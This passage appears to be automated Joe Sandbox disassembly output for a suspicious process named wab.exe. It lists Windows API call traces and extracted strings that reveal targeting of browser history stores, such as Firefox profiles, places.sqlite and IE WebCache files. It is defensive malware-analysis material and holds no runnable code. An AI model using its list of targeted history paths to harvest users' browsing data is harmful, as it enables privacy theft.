                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                    APIs
                    • memset.MSVCRT ref: 00403C09
                    • memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                    • wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • wcscat.MSVCRT ref: 00403C70
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscat$Closewcscpywcslen
                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                    APIs
                    • memset.MSVCRT ref: 0040A824
                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • wcscpy.MSVCRT ref: 0040A854
                    • wcscat.MSVCRT ref: 0040A86A
                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    APIs
                    • wcschr.MSVCRT ref: 00414458
                    • _snwprintf.MSVCRT ref: 0041447D
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                    • String ID: "%s"
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProcessTimes
                    • String ID: GetProcessTimes$kernel32.dll
                    APIs
                    • memset.MSVCRT ref: 004087D6
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                    • memset.MSVCRT ref: 00408828
                    • memset.MSVCRT ref: 00408840
                    • memset.MSVCRT ref: 00408858
                    • memset.MSVCRT ref: 00408870
                    • memset.MSVCRT ref: 00408888
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                    • String ID:
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp
                    • String ID: @ $SQLite format 3
                    APIs
                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    • memset.MSVCRT ref: 00414C87
                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseProcVersionmemsetwcscpy
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpqsort
                    • String ID: /nosort$/sort
                    APIs
                    • memset.MSVCRT ref: 0040E60F
                    • memset.MSVCRT ref: 0040E629
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                    APIs
                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                    • LockResource.KERNEL32(00000000), ref: 004148EF
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    Strings
                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: only a single result allowed for a SELECT that is part of an expression
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 004175D0
                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotificationSleep
                    • String ID: }A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DeleteObject
                    • String ID: r!A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    APIs
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    • memcmp.MSVCRT ref: 00444BA5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$memcmp
                    • String ID: $$8
                    APIs
                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                    • String ID:
                    APIs
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                    • memset.MSVCRT ref: 00403A55
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                    • String ID: history.dat$places.sqlite
                    APIs
                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                    • GetLastError.KERNEL32 ref: 00417627
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$File$PointerRead
                    • String ID:
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: *.*$index.dat
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • GetLastError.KERNEL32 ref: 004175A2
                    • GetLastError.KERNEL32 ref: 004175A8
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$FilePointer
                    • String ID:
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ChangeCloseCreateFindNotificationTime
                    • String ID:
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Temp$DirectoryFileNamePathWindows
                    • String ID:
                    • API String ID: 1125800050-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: d
                    • API String ID: 0-2564639436
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: BINARY
                    • API String ID: 2221118986-907554435
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                    • String ID:
                    • API String ID: 1161345128-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /stext
                    • API String ID: 2081463915-3817206916
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: .#v
                    • API String ID: 2081463915-507759092
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                    • String ID:
                    • API String ID: 159017214-0
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    Strings
                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: malloc
                    • String ID: failed to allocate %u bytes of memory
                    • API String ID: 2803490479-1168259600
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset
                    • String ID:
                    • API String ID: 1065087418-0
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID:
                    • API String ID: 2221118986-0
                    APIs
                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                    • String ID:
                    • API String ID: 1481295809-0
                    APIs
                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 3150196962-0
                    APIs
                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    APIs
                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itowmemset
                    • String ID:
                    • API String ID: 4232544981-0
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    APIs
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FileModuleName
                    • String ID:
                    • API String ID: 3859505661-0
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    Memory Dump Source
